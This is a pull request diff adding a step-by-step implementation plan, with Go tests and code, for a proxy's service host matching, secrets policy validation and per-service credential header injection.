### PR TITLE
feat: service config + host routing (Plan 6)

### DIFF
--- a/docs/superpowers/plans/2026-04-09-plan-06-service-config-routing.md
+++ b/docs/superpowers/plans/2026-04-09-plan-06-service-config-routing.md
@@ -1,0 +1,1969 @@
+# Plan 6: Service Config & Host Routing — Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Parse `providers:` and `services:` from policy YAML, match proxy requests to services by host, and inject real credentials into outbound headers per service.
+
+**Architecture:** A new `ServiceMatcher` resolves Host headers to service names. The existing hook Registry (already keyed by service name) dispatches per-service hooks. A `HeaderInjectionHook` sets real credentials on outbound headers. A resolver layer bridges policy YAML to the existing secrets infrastructure (provider Registry, BootstrapCredentials).
+
+**Tech Stack:** Go, gopkg.in/yaml.v3, net/http, existing credsub.Table + secrets.Registry + Hook interface
+
+**Spec:** `docs/superpowers/specs/2026-04-09-plan-06-service-config-routing-design.md`
+
+---
+
+## File Structure
+
+### New files
+
+| File | Responsibility |
+|------|---------------|
+| `internal/proxy/services/matcher.go` | ServiceMatcher — host pattern matching (literal + wildcard) |
+| `internal/proxy/services/matcher_test.go` | Matcher tests |
+| `internal/policy/secrets.go` | ServiceYAML, validation functions for providers/services |
+| `internal/policy/secrets_test.go` | YAML parsing + validation tests |
+| `internal/session/secretsconfig.go` | Resolver: policy YAML → ProviderConfig + ServiceConfig, constructor map |
+| `internal/session/secretsconfig_test.go` | Resolver unit tests |
+
+### Modified files
+
+| File | Change |
+|------|--------|
+| `internal/policy/model.go` | Add `Providers` and `Services` fields to Policy struct |
+| `internal/proxy/credsub/table.go` | Add `RealForService` method |
+| `internal/proxy/credsub/table_test.go` | RealForService tests |
+| `internal/proxy/credshook.go` | Add `HeaderInjectionHook`; extend `CredsSubHook` PreHook for headers/query/path; make `LeakGuardHook` service-aware |
+| `internal/proxy/credshook_test.go` | Tests for all three changes |
+| `internal/proxy/proxy.go` | Add `matcher` field, `SetMatcher`, populate `ServiceName` in `ServeHTTP` |
+| `internal/proxy/proxy_hooks_test.go` | Test service-name dispatch via matcher |
+| `internal/session/llmproxy.go` | Accept policy YAML, call resolver, register per-service hooks |
+| `internal/session/llmproxy_test.go` | Update call sites |
+| `internal/api/app.go` | Pass parsed policy providers/services to StartLLMProxy |
+
+---
+
+### Task 1: ServiceMatcher
+
+**Files:**
+- Create: `internal/proxy/services/matcher.go`
+- Test: `internal/proxy/services/matcher_test.go`
+
+- [ ] **Step 1: Write failing tests for ServiceMatcher**
+
+```go
+// internal/proxy/services/matcher_test.go
+package services
+
+import "testing"
+
+func TestMatcher_LiteralMatch(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("api.github.com")
+	if !ok || name != "github" {
+		t.Errorf("Match(api.github.com) = (%q, %v), want (github, true)", name, ok)
+	}
+}
+
+func TestMatcher_LiteralMatch_CaseInsensitive(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("API.GitHub.COM")
+	if !ok || name != "github" {
+		t.Errorf("Match(API.GitHub.COM) = (%q, %v), want (github, true)", name, ok)
+	}
+}
+
+func TestMatcher_WildcardMatch(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"*.github.com"}},
+	})
+
+	tests := []struct {
+		host string
+		want bool
+	}{
+		{"api.github.com", true},
+		{"uploads.github.com", true},
+		{"github.com", false},             // bare domain doesn't match wildcard
+		{"sub.api.github.com", false},      // multi-level doesn't match
+	}
+
+	for _, tt := range tests {
+		name, ok := m.Match(tt.host)
+		if ok != tt.want {
+			t.Errorf("Match(%q) ok=%v, want %v (name=%q)", tt.host, ok, tt.want, name)
+		}
+		if ok && name != "github" {
+			t.Errorf("Match(%q) name=%q, want github", tt.host, name)
+		}
+	}
+}
+
+func TestMatcher_PortStripping(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("api.github.com:443")
+	if !ok || name != "github" {
+		t.Errorf("Match(api.github.com:443) = (%q, %v), want (github, true)", name, ok)
+	}
+}
+
+func TestMatcher_FirstMatchWins(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "specific", Hosts: []string{"api.example.com"}},
+		{Name: "wildcard", Hosts: []string{"*.example.com"}},
+	})
+	name, ok := m.Match("api.example.com")
+	if !ok || name != "specific" {
+		t.Errorf("Match(api.example.com) = (%q, %v), want (specific, true)", name, ok)
+	}
+}
+
+func TestMatcher_NoMatch(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+	name, ok := m.Match("evil.com")
+	if ok {
+		t.Errorf("Match(evil.com) = (%q, true), want (\"\", false)", name)
+	}
+}
+
+func TestMatcher_Empty(t *testing.T) {
+	m := NewMatcher(nil)
+	_, ok := m.Match("anything.com")
+	if ok {
+		t.Error("empty matcher should never match")
+	}
+}
+
+func TestMatcher_MultipleHosts(t *testing.T) {
+	m := NewMatcher([]ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com", "uploads.github.com"}},
+	})
+	for _, host := range []string{"api.github.com", "uploads.github.com"} {
+		name, ok := m.Match(host)
+		if !ok || name != "github" {
+			t.Errorf("Match(%q) = (%q, %v), want (github, true)", host, name, ok)
+		}
+	}
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `go test ./internal/proxy/services/ -v -run TestMatcher`
+Expected: FAIL — package does not exist
+
+- [ ] **Step 3: Implement ServiceMatcher**
+
+```go
+// internal/proxy/services/matcher.go
+package services
+
+import "strings"
+
+// ServicePattern describes a service's host matching rules.
+type ServicePattern struct {
+	Name  string
+	Hosts []string // literal hostnames or "*.suffix" wildcards
+}
+
+// hostPattern is a pre-compiled host pattern.
+type hostPattern struct {
+	serviceName string
+	isWildcard  bool
+	literal     string // lowercase, used when isWildcard == false
+	suffix      string // lowercase, ".example.com", used when isWildcard == true
+}
+
+// Matcher resolves HTTP Host headers to service names.
+// Safe for concurrent use — all state is read-only after construction.
+type Matcher struct {
+	patterns []hostPattern
+}
+
+// NewMatcher pre-compiles service host patterns. Order matters:
+// first match wins.
+func NewMatcher(services []ServicePattern) *Matcher {
+	var patterns []hostPattern
+	for _, svc := range services {
+		for _, h := range svc.Hosts {
+			p := hostPattern{serviceName: svc.Name}
+			if strings.HasPrefix(h, "*.") {
+				p.isWildcard = true
+				p.suffix = strings.ToLower(h[1:]) // keep the dot: ".example.com"
+			} else {
+				p.literal = strings.ToLower(h)
+			}
+			patterns = append(patterns, p)
+		}
+	}
+	return &Matcher{patterns: patterns}
+}
+
+// Match returns the service name for the given host, or ("", false)
+// if no pattern matches. Port is stripped before matching.
+func (m *Matcher) Match(host string) (string, bool) {
+	// Strip port if present.
+	if i := strings.LastIndex(host, ":"); i != -1 {
+		host = host[:i]
+	}
+	host = strings.ToLower(host)
+
+	for _, p := range m.patterns {
+		if p.isWildcard {
+			// *.example.com matches api.example.com but not
+			// example.com and not sub.api.example.com.
+			if strings.HasSuffix(host, p.suffix) {
+				prefix := host[:len(host)-len(p.suffix)]
+				if len(prefix) > 0 && !strings.Contains(prefix, ".") {
+					return p.serviceName, true
+				}
+			}
+		} else {
+			if host == p.literal {
+				return p.serviceName, true
+			}
+		}
+	}
+	return "", false
+}
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `go test ./internal/proxy/services/ -v -run TestMatcher`
+Expected: PASS (all 8 tests)
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add internal/proxy/services/matcher.go internal/proxy/services/matcher_test.go
+git commit -m "feat(proxy/services): ServiceMatcher with literal + wildcard host matching"
+```
+
+---
+
+### Task 2: Table.RealForService
+
+**Files:**
+- Modify: `internal/proxy/credsub/table.go`
+- Modify: `internal/proxy/credsub/table_test.go`
+
+- [ ] **Step 1: Write failing tests for RealForService**
+
+Append to `internal/proxy/credsub/table_test.go`:
+
+```go
+func TestTable_RealForService(t *testing.T) {
+	tbl := New()
+	fake := []byte("FAKE_CREDENTIAL_24CHARS!")
+	real := []byte("REAL_CREDENTIAL_24CHARS!")
+	if err := tbl.Add("github", fake, real); err != nil {
+		t.Fatal(err)
+	}
+
+	got, ok := tbl.RealForService("github")
+	if !ok {
+		t.Fatal("RealForService(github) returned false")
+	}
+	if !bytes.Equal(got, real) {
+		t.Errorf("got %q, want %q", got, real)
+	}
+
+	// Returned slice must be a copy — mutating it must not affect table.
+	got[0] = 'X'
+	got2, _ := tbl.RealForService("github")
+	if got2[0] == 'X' {
+		t.Error("RealForService returned aliased slice, not a copy")
+	}
+}
+
+func TestTable_RealForService_UnknownService(t *testing.T) {
+	tbl := New()
+	_, ok := tbl.RealForService("nonexistent")
+	if ok {
+		t.Error("RealForService should return false for unknown service")
+	}
+}
+
+func TestTable_RealForService_AfterZero(t *testing.T) {
+	tbl := New()
+	if err := tbl.Add("github",
+		[]byte("FAKE_CREDENTIAL_24CHARS!"),
+		[]byte("REAL_CREDENTIAL_24CHARS!"),
+	); err != nil {
+		t.Fatal(err)
+	}
+	tbl.Zero()
+	_, ok := tbl.RealForService("github")
+	if ok {
+		t.Error("RealForService should return false after Zero()")
+	}
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `go test ./internal/proxy/credsub/ -v -run TestTable_RealForService`
+Expected: FAIL — `tbl.RealForService` undefined
+
+- [ ] **Step 3: Implement RealForService**
+
+Add to `internal/proxy/credsub/table.go` after the `FakeForService` method:
+
+```go
+// RealForService returns the real byte sequence registered for a
+// service. The returned slice is a deep copy; the caller may retain
+// or mutate it. Callers should zero the returned slice when done to
+// avoid leaving credential material in memory.
+//
+// This method is intended for internal proxy use only (e.g. header
+// injection). Returns (nil, false) if no entry is registered.
+func (t *Table) RealForService(serviceName string) ([]byte, bool) {
+	t.mu.RLock()
+	defer t.mu.RUnlock()
+
+	for _, e := range t.entries {
+		if e.ServiceName == serviceName {
+			out := make([]byte, len(e.Real))
+			copy(out, e.Real)
+			return out, true
+		}
+	}
+	return nil, false
+}
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `go test ./internal/proxy/credsub/ -v -run TestTable_RealForService`
+Expected: PASS (all 3)
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add internal/proxy/credsub/table.go internal/proxy/credsub/table_test.go
+git commit -m "feat(credsub): add RealForService for header injection"
+```
+
+---
+
+### Task 3: Policy YAML types + validation
+
+**Files:**
+- Modify: `internal/policy/model.go`
+- Create: `internal/policy/secrets.go`
+- Create: `internal/policy/secrets_test.go`
+
+- [ ] **Step 1: Add Providers and Services fields to Policy struct**
+
+In `internal/policy/model.go`, add the import `"gopkg.in/yaml.v3"` is already present. Add two fields to the `Policy` struct right after the `TransparentCommands` field:
+
+```go
+	// External secrets: provider definitions and service declarations.
+	// Parsed from YAML but validated by ValidateSecrets in secrets.go.
+	Providers map[string]yaml.Node `yaml:"providers,omitempty"`
+	Services  []ServiceYAML        `yaml:"services,omitempty"`
+```
+
+- [ ] **Step 2: Write the YAML types and validation in secrets.go**
+
+```go
+// internal/policy/secrets.go
+package policy
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/agentsh/agentsh/internal/proxy/secrets"
+	"gopkg.in/yaml.v3"
+)
+
+// ServiceYAML represents a service declaration in policy YAML.
+type ServiceYAML struct {
+	Name          string             `yaml:"name"`
+	Match         ServiceMatchYAML   `yaml:"match"`
+	Secret        ServiceSecretYAML  `yaml:"secret"`
+	Fake          ServiceFakeYAML    `yaml:"fake"`
+	Inject        ServiceInjectYAML  `yaml:"inject,omitempty"`
+	ScrubResponse bool               `yaml:"scrub_response,omitempty"`
+	Hooks         []string           `yaml:"hooks,omitempty"`
+}
+
+// ServiceMatchYAML defines which hosts a service matches.
+type ServiceMatchYAML struct {
+	Hosts []string `yaml:"hosts"`
+}
+
+// ServiceSecretYAML defines how to fetch the real credential.
+type ServiceSecretYAML struct {
+	Ref       string `yaml:"ref"`
+	OnMissing string `yaml:"on_missing,omitempty"`
+}
+
+// ServiceFakeYAML defines how to generate the fake credential.
+type ServiceFakeYAML struct {
+	Format string `yaml:"format"`
+}
+
+// ServiceInjectYAML defines how the credential is injected.
+type ServiceInjectYAML struct {
+	Header *ServiceInjectHeaderYAML `yaml:"header,omitempty"`
+	Env    []ServiceInjectEnvYAML   `yaml:"env,omitempty"`
+}
+
+// ServiceInjectHeaderYAML defines header injection config.
+type ServiceInjectHeaderYAML struct {
+	Name     string `yaml:"name"`
+	Template string `yaml:"template"`
+}
+
+// ServiceInjectEnvYAML defines env var injection config (parsed, not wired in Plan 6).
+type ServiceInjectEnvYAML struct {
+	Name string `yaml:"name"`
+}
+
+// knownProviderTypes lists the provider type names (URI schemes) that
+// Plan 6 supports. Extended as new providers land.
+var knownProviderTypes = map[string]bool{
+	"keyring": true,
+	"vault":   true,
+}
+
+// ValidateSecrets validates the providers and services sections of a Policy.
+// It checks structural rules only — provider constructability and secret
+// existence are validated at bootstrap time.
+func ValidateSecrets(providers map[string]yaml.Node, services []ServiceYAML) (warnings []string, err error) {
+	// Collect declared provider schemes for cross-referencing.
+	providerSchemes := make(map[string]string) // scheme → provider name
+	for name, node := range providers {
+		ptype, typeErr := extractProviderType(node)
+		if typeErr != nil {
+			return nil, fmt.Errorf("providers.%s: %w", name, typeErr)
+		}
+		if !knownProviderTypes[ptype] {
+			return nil, fmt.Errorf("providers.%s: unknown type %q", name, ptype)
+		}
+		if prev, dup := providerSchemes[ptype]; dup {
+			return nil, fmt.Errorf("providers.%s: duplicate type %q (already declared by %q)", name, ptype, prev)
+		}
+		providerSchemes[ptype] = name
+	}
+
+	// Validate services.
+	seen := make(map[string]bool)
+	hostOwner := make(map[string]string) // host pattern → first service name (for overlap warnings)
+	for i, svc := range services {
+		if svc.Name == "" {
+			return nil, fmt.Errorf("services[%d]: name is required", i)
+		}
+		if seen[svc.Name] {
+			return nil, fmt.Errorf("services[%d]: duplicate service name %q", i, svc.Name)
+		}
+		seen[svc.Name] = true
+
+		// match.hosts
+		if len(svc.Match.Hosts) == 0 {
+			return nil, fmt.Errorf("services[%d] %q: match.hosts must not be empty", i, svc.Name)
+		}
+		for _, h := range svc.Match.Hosts {
+			if err := validateHostPattern(h); err != nil {
+				return nil, fmt.Errorf("services[%d] %q: match.hosts: %w", i, svc.Name, err)
+			}
+			if prev, overlap := hostOwner[strings.ToLower(h)]; overlap {
+				warnings = append(warnings, fmt.Sprintf(
+					"services: host pattern %q in %q overlaps with %q (first match wins)", h, svc.Name, prev))
+			}
+			hostOwner[strings.ToLower(h)] = svc.Name
+		}
+
+		// secret.ref — must parse and reference a declared provider
+		ref, parseErr := secrets.ParseRef(svc.Secret.Ref)
+		if parseErr != nil {
+			return nil, fmt.Errorf("services[%d] %q: secret.ref: %w", i, svc.Name, parseErr)
+		}
+		if _, ok := providerSchemes[ref.Scheme]; !ok && len(providers) > 0 {
+			return nil, fmt.Errorf("services[%d] %q: secret.ref scheme %q has no matching provider", i, svc.Name, ref.Scheme)
+		}
+
+		// fake.format
+		if _, _, fmtErr := secrets.ParseFormat(svc.Fake.Format); fmtErr != nil {
+			return nil, fmt.Errorf("services[%d] %q: fake.format: %w", i, svc.Name, fmtErr)
+		}
+
+		// on_missing
+		switch svc.Secret.OnMissing {
+		case "", "fail":
+			// ok
+		default:
+			return nil, fmt.Errorf("services[%d] %q: on_missing %q not supported (only \"fail\" in Plan 6)", i, svc.Name, svc.Secret.OnMissing)
+		}
+
+		// inject.header.template
+		if svc.Inject.Header != nil {
+			if svc.Inject.Header.Name == "" {
+				return nil, fmt.Errorf("services[%d] %q: inject.header.name is required", i, svc.Name)
+			}
+			if !strings.Contains(svc.Inject.Header.Template, "{{secret}}") {
+				return nil, fmt.Errorf("services[%d] %q: inject.header.template must contain {{secret}}", i, svc.Name)
+			}
+		}
+	}
+
+	return warnings, nil
+}
+
+// extractProviderType decodes just the "type" field from a provider yaml.Node.
+func extractProviderType(node yaml.Node) (string, error) {
+	var base struct {
+		Type string `yaml:"type"`
+	}
+	if err := node.Decode(&base); err != nil {
+		return "", fmt.Errorf("decode type: %w", err)
+	}
+	if base.Type == "" {
+		return "", fmt.Errorf("type is required")
+	}
+	return base.Type, nil
+}
+
+// validateHostPattern checks that a host pattern is a valid literal or
+// a single-level wildcard ("*.example.com").
+func validateHostPattern(pattern string) error {
+	if pattern == "" {
+		return fmt.Errorf("empty host pattern")
+	}
+	if strings.HasPrefix(pattern, "*.") {
+		suffix := pattern[2:]
+		if suffix == "" || strings.Contains(suffix, "*") {
+			return fmt.Errorf("invalid wildcard pattern %q", pattern)
+		}
+		return nil
+	}
+	if strings.Contains(pattern, "*") {
+		return fmt.Errorf("wildcard must be at start: %q", pattern)
+	}
+	return nil
+}
+```
+
+- [ ] **Step 3: Write validation tests**
+
+```go
+// internal/policy/secrets_test.go
+package policy
+
+import (
+	"strings"
+	"testing"
+
+	"gopkg.in/yaml.v3"
+)
+
+func mustNode(t *testing.T, yamlStr string) yaml.Node {
+	t.Helper()
+	var node yaml.Node
+	if err := yaml.Unmarshal([]byte(yamlStr), &node); err != nil {
+		t.Fatal(err)
+	}
+	// yaml.Unmarshal wraps in a document node; return the content.
+	if node.Kind == yaml.DocumentNode && len(node.Content) > 0 {
+		return *node.Content[0]
+	}
+	return node
+}
+
+func TestValidateSecrets_Valid(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+		"vault":   mustNode(t, "type: vault\naddress: https://vault.example.com\nauth:\n  method: token\n  token: test"),
+	}
+	services := []ServiceYAML{
+		{
+			Name:   "github",
+			Match:  ServiceMatchYAML{Hosts: []string{"api.github.com", "*.github.com"}},
+			Secret: ServiceSecretYAML{Ref: "vault://kv/data/github#token"},
+			Fake:   ServiceFakeYAML{Format: "ghp_{rand:36}"},
+			Inject: ServiceInjectYAML{Header: &ServiceInjectHeaderYAML{
+				Name: "Authorization", Template: "Bearer {{secret}}",
+			}},
+		},
+		{
+			Name:   "anthropic",
+			Match:  ServiceMatchYAML{Hosts: []string{"api.anthropic.com"}},
+			Secret: ServiceSecretYAML{Ref: "keyring://agentsh/anthropic_key"},
+			Fake:   ServiceFakeYAML{Format: "sk-ant-{rand:93}"},
+			Inject: ServiceInjectYAML{Header: &ServiceInjectHeaderYAML{
+				Name: "x-api-key", Template: "{{secret}}",
+			}},
+		},
+	}
+
+	warnings, err := ValidateSecrets(providers, services)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(warnings) != 0 {
+		t.Errorf("unexpected warnings: %v", warnings)
+	}
+}
+
+func TestValidateSecrets_UnknownProviderType(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"foo": mustNode(t, "type: unknown"),
+	}
+	_, err := ValidateSecrets(providers, nil)
+	if err == nil || !strings.Contains(err.Error(), "unknown type") {
+		t.Errorf("expected unknown type error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_DuplicateServiceName(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "github", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+		{Name: "github", Match: ServiceMatchYAML{Hosts: []string{"b.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/c"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "duplicate service name") {
+		t.Errorf("expected duplicate error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_InvalidFakeFormat(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "no-rand-here"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "fake.format") {
+		t.Errorf("expected fake.format error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_MissingSecretTemplate(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{
+			Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}},
+			Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"},
+			Inject: ServiceInjectYAML{Header: &ServiceInjectHeaderYAML{Name: "Auth", Template: "Bearer no-placeholder"}},
+		},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "{{secret}}") {
+		t.Errorf("expected template error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_UndeclaredProviderScheme(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "vault://kv/data/x#y"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "no matching provider") {
+		t.Errorf("expected no matching provider error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_InvalidOnMissing(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: []string{"a.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b", OnMissing: "skip"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "not supported") {
+		t.Errorf("expected on_missing error, got: %v", err)
+	}
+}
+
+func TestValidateSecrets_OverlappingHosts_Warning(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "svc1", Match: ServiceMatchYAML{Hosts: []string{"api.example.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+		{Name: "svc2", Match: ServiceMatchYAML{Hosts: []string{"api.example.com"}}, Secret: ServiceSecretYAML{Ref: "keyring://a/c"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	warnings, err := ValidateSecrets(providers, services)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(warnings) == 0 {
+		t.Error("expected overlap warning")
+	}
+}
+
+func TestValidateSecrets_EmptyPolicy_BackwardCompatible(t *testing.T) {
+	warnings, err := ValidateSecrets(nil, nil)
+	if err != nil {
+		t.Fatalf("empty should be valid: %v", err)
+	}
+	if len(warnings) != 0 {
+		t.Errorf("unexpected warnings: %v", warnings)
+	}
+}
+
+func TestValidateSecrets_EmptyHosts(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"keyring": mustNode(t, "type: keyring"),
+	}
+	services := []ServiceYAML{
+		{Name: "bad", Match: ServiceMatchYAML{Hosts: nil}, Secret: ServiceSecretYAML{Ref: "keyring://a/b"}, Fake: ServiceFakeYAML{Format: "ghp_{rand:36}"}},
+	}
+	_, err := ValidateSecrets(providers, services)
+	if err == nil || !strings.Contains(err.Error(), "hosts must not be empty") {
+		t.Errorf("expected empty hosts error, got: %v", err)
+	}
+}
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `go test ./internal/policy/ -v -run TestValidateSecrets`
+Expected: PASS (all 10 tests)
+
+- [ ] **Step 5: Wire validation into Policy.Validate**
+
+In `internal/policy/model.go`, at the end of the `Validate()` method (before `return nil`), add:
+
+```go
+	// Validate external secrets config.
+	if _, err := ValidateSecrets(p.Providers, p.Services); err != nil {
+		return fmt.Errorf("secrets: %w", err)
+	}
+```
+
+- [ ] **Step 6: Verify full policy parse round-trip**
+
+Run: `go test ./internal/policy/ -v -count=1`
+Expected: PASS (all existing + new tests)
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add internal/policy/model.go internal/policy/secrets.go internal/policy/secrets_test.go
+git commit -m "feat(policy): add providers/services YAML types and validation"
+```
+
+---
+
+### Task 4: HeaderInjectionHook
+
+**Files:**
+- Modify: `internal/proxy/credshook.go`
+- Modify: `internal/proxy/credshook_test.go`
+
+- [ ] **Step 1: Write failing tests for HeaderInjectionHook**
+
+Append to `internal/proxy/credshook_test.go`:
+
+```go
+func TestHeaderInjectionHook_Name(t *testing.T) {
+	tbl := credsub.New()
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+	if h.Name() != "header-inject" {
+		t.Errorf("Name() = %q, want %q", h.Name(), "header-inject")
+	}
+}
+
+func TestHeaderInjectionHook_PreHook_InjectsHeader(t *testing.T) {
+	tbl := newTestTable(t) // has "github" → fake/real pair
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", nil)
+	req.Header.Set("Authorization", "Bearer ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{ServiceName: "github"})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.Header.Get("Authorization")
+	want := "Bearer ghp_REAL1234567890abcdef"
+	if got != want {
+		t.Errorf("Authorization = %q, want %q", got, want)
+	}
+}
+
+func TestHeaderInjectionHook_PreHook_StripsExistingHeader(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", nil)
+	req.Header.Set("Authorization", "Bearer something-wrong")
+	req.Header.Add("Authorization", "Bearer also-wrong")
+
+	err := h.PreHook(req, &RequestContext{ServiceName: "github"})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	// Should have exactly one Authorization header.
+	vals := req.Header.Values("Authorization")
+	if len(vals) != 1 {
+		t.Errorf("expected 1 Authorization value, got %d", len(vals))
+	}
+}
+
+func TestHeaderInjectionHook_PreHook_ServiceNotInTable(t *testing.T) {
+	tbl := credsub.New()
+	h := NewHeaderInjectionHook("nonexistent", "Authorization", "Bearer {{secret}}", tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://example.com", nil)
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook should be no-op when service not in table: %v", err)
+	}
+
+	if req.Header.Get("Authorization") != "" {
+		t.Error("header should not be set when service is not in table")
+	}
+}
+
+func TestHeaderInjectionHook_PostHook_IsNoOp(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", tbl)
+
+	resp := &http.Response{StatusCode: 200, Body: nil}
+	err := h.PostHook(resp, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PostHook should be no-op: %v", err)
+	}
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `go test ./internal/proxy/ -v -run TestHeaderInjectionHook`
+Expected: FAIL — `NewHeaderInjectionHook` undefined
+
+- [ ] **Step 3: Implement HeaderInjectionHook**
+
+Add to `internal/proxy/credshook.go`:
+
+```go
+// HeaderInjectionHook injects the real credential into a request header.
+// Registered per service name so it only fires for matched requests.
+type HeaderInjectionHook struct {
+	serviceName string
+	headerName  string
+	template    string
+	table       *credsub.Table
+}
+
+// NewHeaderInjectionHook creates a hook that injects the real credential
+// for serviceName into the header specified by headerName using template.
+// The template must contain "{{secret}}" which is replaced with the real
+// credential at request time.
+func NewHeaderInjectionHook(serviceName, headerName, template string, table *credsub.Table) *HeaderInjectionHook {
+	return &HeaderInjectionHook{
+		serviceName: serviceName,
+		headerName:  headerName,
+		template:    template,
+		table:       table,
+	}
+}
+
+func (h *HeaderInjectionHook) Name() string { return "header-inject" }
+
+func (h *HeaderInjectionHook) PreHook(r *http.Request, _ *RequestContext) error {
+	real, ok := h.table.RealForService(h.serviceName)
+	if !ok {
+		return nil // service not in table, skip
+	}
+	defer func() {
+		for i := range real {
+			real[i] = 0
+		}
+	}()
+
+	value := strings.Replace(h.template, "{{secret}}", string(real), 1)
+	r.Header.Del(h.headerName)
+	r.Header.Set(h.headerName, value)
+	return nil
+}
+
+func (h *HeaderInjectionHook) PostHook(_ *http.Response, _ *RequestContext) error {
+	return nil
+}
+```
+
+Also add `"strings"` to the imports at the top of `credshook.go`.
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `go test ./internal/proxy/ -v -run TestHeaderInjectionHook`
+Expected: PASS (all 5)
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add internal/proxy/credshook.go internal/proxy/credshook_test.go
+git commit -m "feat(proxy): HeaderInjectionHook for per-service header injection"
+```
+
+---
+
+### Task 5: Extended CredsSubHook (headers, query, path)
+
+**Files:**
+- Modify: `internal/proxy/credshook.go`
+- Modify: `internal/proxy/credshook_test.go`
+
+- [ ] **Step 1: Write failing tests for extended substitution**
+
+Append to `internal/proxy/credshook_test.go`:
+
+```go
